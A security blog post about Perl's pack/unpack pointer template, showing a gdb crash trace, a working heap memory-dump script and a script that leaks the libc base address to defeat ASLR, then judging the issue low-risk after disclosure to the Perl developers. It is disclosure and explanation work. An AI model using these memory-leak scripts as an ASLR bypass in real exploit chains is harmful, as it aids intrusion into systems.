Perl, like many other languages, provides pack()/unpack() functions which convert data to and from raw binary representations. For instance, running…
printf("%s", pack("L",0x41424344));
…will print DCBA (on a little-endian machine). The first argument is a template that specifies how to pack or unpack the data. For example, in the snippet above, the “L” signifies an unsigned 32-bit long. For the most part these functions are implemented as you would expect. However, Perl adds a template not present in any other language I’ve ever seen: the “p/P” template. According to the Perl documentation, this template specifies a pointer. [1] Yes, you read that right, a pointer. It’s supposed to work like this…
$a = pack("p", "testing testing 123");
# prints 0xNNNNNNNN (raw pointer to the string)
printf("0x%08x", unpack("L", $a));
# prints "testing testing 123"
printf("%s", unpack("p", $a));
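On a 64-bit build the "L" above only shows the low 32 bits of the pointer. Here is a minimal sketch of the same round trip that picks an integer template as wide as the pointer. The variable names and the choice of "Q" versus "L" are my own assumptions (it presumes a build with 8-byte pointers also supports 64-bit integers), not something the documentation prescribes.

```perl
use strict;
use warnings;
use Config;

# Pick an integer template as wide as a pointer on this build.
# Assumption: 8-byte pointers imply 64-bit integer support for "Q".
my $int_tmpl = $Config{ptrsize} == 8 ? "Q" : "L";

my $str    = "testing testing 123";  # keep the string alive in a variable
my $packed = pack("p", $str);        # raw pointer bytes, native byte order

printf("pointer is %d bytes wide\n", length($packed));
printf("address:   0x%x\n", unpack($int_tmpl, $packed));
printf("string:    %s\n", unpack("p", $packed));
```

Holding the string in a named variable matters: the pointer is only valid while the string it points at still exists.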
But if we can control the pointer itself, what else could we read? Let’s try unpack()’ing an arbitrary pointer using the “p” template…
andrew@WOPR ~ % gdb -q perl
Reading symbols from perl...(no debugging symbols found)...done.
(gdb) r -e 'print unpack("p","AAAAAAAA");'
Starting program: /usr/bin/perl -e 'print unpack("p","AAAAAAAA");'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
(gdb) x/1i $rip
=> 0x7ffff76c5d76: movdqu (%rax),%xmm4
(gdb) i r $rax
rax 0x4141414141414141 4702111234474983745
(gdb) bt
#0 0x00007ffff76c5d76 in strlen () from /usr/lib/libc.so.6
#1 0x00007ffff7ad8583 in Perl_newSVpv () from /usr/lib/perl5/core_perl/CORE/libperl.so
#2 0x00007ffff7b553a2 in S_unpack_rec () from /usr/lib/perl5/core_perl/CORE/libperl.so
#3 0x00007ffff7b57708 in Perl_unpackstring () from /usr/lib/perl5/core_perl/CORE/libperl.so
#4 0x00007ffff7b578e6 in Perl_pp_unpack () from /usr/lib/perl5/core_perl/CORE/libperl.so
#5 0x00007ffff7abb2c6 in Perl_runops_standard () from /usr/lib/perl5/core_perl/CORE/libperl.so
#6 0x00007ffff7a43379 in perl_run () from /usr/lib/perl5/core_perl/CORE/libperl.so
#7 0x0000000000400e29 in main ()
(gdb)
There you have it. Perl is attempting to read from a completely controllable address. This can be leveraged to read any mapped memory in the process. Let’s do that. The following script dumps memory from the heap, starting at a known string, until it runs off the end of the mapped region and crashes. It could easily be modified to keep leaking the next page(s) too, but I didn’t add that logic.
#!/usr/bin/perl
use Time::HiRes;

$row_width = 16;
$print_throttle = 10000;

$str = "whatever";                  # put something on the heap
$ptr = unpack("Q",pack("p",$str));  # get a real pointer to it
$str2 = "TESTING";

for(;;$ptr+=$row_width) {
    # print the address
    printf("0x%016x | ", $ptr);

    # print $row_width hex bytes
    for($c=0; $c<$row_width; $c++) {
        $a = unpack("p",pack("Q",$ptr+$c)); # string
        $a = substr($a,0,1);                # single byte
        printf("%02x ", ord($a));
    }
    print "| ";

    # print real bytes
    for($c=0; $c<$row_width; $c++) {
        $a = unpack("p",pack("Q",$ptr+$c)); # string
        $a = substr($a,0,1);                # single byte
        # only print ascii
        if(ord($a) >= 0x20 && ord($a) <= 0x7e) {
            printf("%c", ord($a));
        } else {
            printf(".");
        }
    }
    printf(" |\n");

    # sleep just a moment so we don't spam stdout
    Time::HiRes::usleep($print_throttle);
}
Try it yourself! You should see something like this…
andrew@WOPR ~ % /tmp/leak.pl
0x0000000001895dc0 | 77 68 61 74 65 76 65 72 00 01 87 01 00 00 00 00 | whatever........ |
0x0000000001895dd0 | b8 91 87 01 00 00 00 00 21 00 00 00 00 00 00 00 | ........!....... |
0x0000000001895de0 | 90 5d 89 01 00 00 00 00 28 c1 87 01 00 00 00 00 | .]......(....... |
0x0000000001895df0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895e00 | 00 00 00 00 00 00 00 00 18 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e10 | 02 00 00 00 00 00 00 00 97 c6 ad 70 08 00 00 00 | ...........p.... |
0x0000000001895e20 | 50 65 72 6c 49 4f 3a 3a 00 00 00 00 00 00 00 00 | PerlIO::........ |
0x0000000001895e30 | 00 00 00 00 00 00 00 00 61 00 00 00 00 00 00 00 | ........a....... |
0x0000000001895e40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
0x0000000001895e50 | 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 | ................ |
0x0000000001895e60 | 70 c1 87 01 00 00 00 00 00 00 00 00 00 00 00 00 | p............... |
0x0000000001895e70 | 00 00 00 00 00 00 00 00 58 c1 87 01 00 00 00 00 | ........X....... |
0x0000000001895e80 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895e90 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ea0 | 00 00 00 00 00 00 00 00 b8 5e 89 01 00 00 00 00 | .........^...... |
0x0000000001895eb0 | 5d 00 00 00 00 00 00 00 2d d7 2b 1b 0c 00 00 00 | ].......-.+..... |
0x0000000001895ec0 | 2f 74 6d 70 2f 6c 65 61 6b 2e 70 6c 00 00 00 00 | /tmp/leak.pl.... |
0x0000000001895ed0 | 00 00 00 00 00 00 00 00 41 00 00 00 00 00 00 00 | ........A....... |
0x0000000001895ee0 | 00 00 00 00 00 00 00 00 60 6a 03 bb 4a 7f 00 00 | ........`j..J... |
... etc ...
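The leak script reads one byte per unpack() call, because "p" stops at the first NUL. As far as I can tell from the pack documentation, the companion "P" template takes an explicit length and reads that many bytes in one go. The sketch below uses it to build one dump row. The helper names peek() and hexdump_row() are hypothetical, and the "Q"/"L" selection assumes a build with 8-byte pointers also has 64-bit integers.

```perl
use strict;
use warnings;
use Config;

# Integer template as wide as a pointer (assumption, see lead-in).
my $PTR = $Config{ptrsize} == 8 ? "Q" : "L";

# Hypothetical helper: read $len raw bytes starting at $addr.
# Like the "p" trick, this segfaults if the address is not mapped.
sub peek {
    my ($addr, $len) = @_;
    return unpack("P$len", pack($PTR, $addr));
}

# Hypothetical helper: format one row as "address | hex | ascii |".
sub hexdump_row {
    my ($addr, $bytes) = @_;
    my $hex = join(" ", unpack("(H2)*", $bytes));
    (my $ascii = $bytes) =~ s/[^\x20-\x7e]/./g;  # mask non-printables
    return sprintf("0x%016x | %s | %s |", $addr, $hex, $ascii);
}

my $str  = "whatever";                     # something to point at
my $addr = unpack($PTR, pack("p", $str));  # its address
my $row  = hexdump_row($addr, peek($addr, length($str)));
print "$row\n";
```

I only read length($str) bytes here so the sketch stays inside memory it knows is valid; a real dumper would read a full row at a time and accept that it may eventually crash.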
But we can do better! Even though memory disclosures like this don’t give direct code execution, they are extremely useful when combined with another, more serious bug, because they provide an easy ASLR bypass. If we can read pointers from memory, we can calculate exactly where code is located. Astute readers may have noticed that the last 8 bytes of the last line above are a pointer to a shared library: 0x00007f4abb036a60 (stored little-endian, so the bytes appear reversed). All we need to do is predict the relative location of a useful pointer (such as one into libc), and snag it. That turns out to be fairly easy. Observe…
#!/usr/bin/perl

# this code is tuned for 64bit and will crash on 32bit
# but there's no reason it wouldn't work there too
# would just take a little modification / heap grooming

# by whatever random chance, this broken IO puts a libc
# pointer in just the right place on the heap. *shrug*
open(DERP, "</etc/passwd");
while(<DERP>){};

$libc = 0x0;
$str = "whatever";                  # put something on the heap
$ptr = unpack("Q",pack("p",$str));  # get a real pointer to it
$ptr = $ptr + 8;                    # the libc ptr is just past it

for($c=0;$c<8;$c++) {
    # read 8 bytes and lay them over $libc
    $byte = substr(unpack("p",pack("Q",$ptr+$c)),0,1);
    $libc += ord($byte) << ($c * 8);
}

# the libc base is either at $libc-0x394100 or $libc-0x38c100
# we can't be sure which, but either way the memory is readable
# so we just look for \x7fELF and choose the one that has it :)
# 0x156 == '\x7f' + 'E' + 'L' + 'F'
$header_sum = 0;
for($c=0;$c<4;$c++) {
    $byte = substr(unpack("p",pack("Q",$libc-0x38c100+$c)),0,1);
    $header_sum += ord($byte);
}
if($header_sum == 0x156) {
    $libc -= 0x38c100;
} else {
    $libc -= 0x394100;
}

printf("LEAKED: libc @ 0x%012x\n", $libc);
printf("Checking with /proc/self/maps to make sure...\n");
open(FILE, "</proc/self/maps");
while(<FILE>) {
    if(/libc-/) { print "$_"; }
}
I’ve only tested this code on a few systems (Arch and Debian), but it worked nicely on both. Your mileage may vary. If all goes well, you should see…
andrew@WOPR ~ % /tmp/aslr_bypass.pl
LEAKED: libc @ 0x7ffac762c000
Checking with /proc/self/maps to make sure...
7ffac762c000-7ffac77c3000 r-xp 00000000 fe:01 4862344 /usr/lib/libc-2.23.so
7ffac77c3000-7ffac79c3000 ---p 00197000 fe:01 4862344 /usr/lib/libc-2.23.so
7ffac79c3000-7ffac79c7000 r--p 00197000 fe:01 4862344 /usr/lib/libc-2.23.so
7ffac79c7000-7ffac79c9000 rw-p 0019b000 fe:01 4862344 /usr/lib/libc-2.23.so
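Two steps in that script can be written more directly, and this sketch shows one way. The byte-by-byte shift loop can be replaced with unpack()'s "Q<" template (little-endian 64-bit, which assumes a Perl built with 64-bit integers), and the ELF check can compare the magic bytes themselves instead of their sum. The function names are hypothetical, and the sample bytes are the last 8 bytes of the final row of the heap dump shown earlier.

```perl
use strict;
use warnings;

# Decode 8 little-endian bytes into an integer.
# "Q<" requires a Perl with 64-bit integer support (assumption).
sub le_bytes_to_ptr {
    my ($bytes) = @_;
    return unpack("Q<", $bytes);
}

# True if the buffer starts with the 4-byte ELF magic.
sub looks_like_elf {
    my ($bytes) = @_;
    return substr($bytes, 0, 4) eq "\x7fELF";
}

# 60 6a 03 bb 4a 7f 00 00, taken from the heap dump.
my $leaked = pack("H*", "606a03bb4a7f0000");
printf("0x%016x\n", le_bytes_to_ptr($leaked));  # prints 0x00007f4abb036a60

print looks_like_elf("\x7fELF\x02\x01\x01") ? "ELF\n" : "not ELF\n";  # ELF
print looks_like_elf("FLE\x7f")             ? "ELF\n" : "not ELF\n";  # not ELF
```

The second test string has the same byte sum (0x156) as the real magic, so a sum-based check would accept it. In practice the sum is good enough for choosing between two candidate offsets, but the direct comparison costs nothing extra.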
All of that being the case, is this a serious security concern? Probably not, no. To be fair, I can’t think of a situation in which it would pose a real threat, but I still find it shocking and bizarre. When I mentioned it to the development team, they stated:
“It’s as ugly as hell, but there may be people still using it, which is why we’re reluctant to get rid of it. The question is whether it represents any sort of security issue. I can’t currently see that it does.”

Since any sort of “exploit” for this issue requires the ability to run arbitrary Perl anyway, I tend to agree. An attacker who can run code already could just as easily read /proc/self/mem, or do any number of much more malicious things. Even a malicious script uploaded to a webserver wouldn’t need an exploit, since Perl does not offer the same “safe mode” functionality that similar languages like PHP do. Any attacker who can run unpack() can already do far worse.
Regardless, it seems wrong to me that interpreted code should be allowed to access memory directly. Is that not one of the core advantages of an interpreted language: keeping the code from doing dangerous things with memory? Maybe this doesn’t pose a threat, but at the very least I’ll agree with the “ugly as hell” sentiment.
That said, if anyone can think of a situation in which this IS highly dangerous I’d love to hear about it. Feel free to comment below or send me a message directly. Until then we can just categorize this as “LOL”, and move on. :)
[1]. http://perldoc.perl.org/functions/pack.html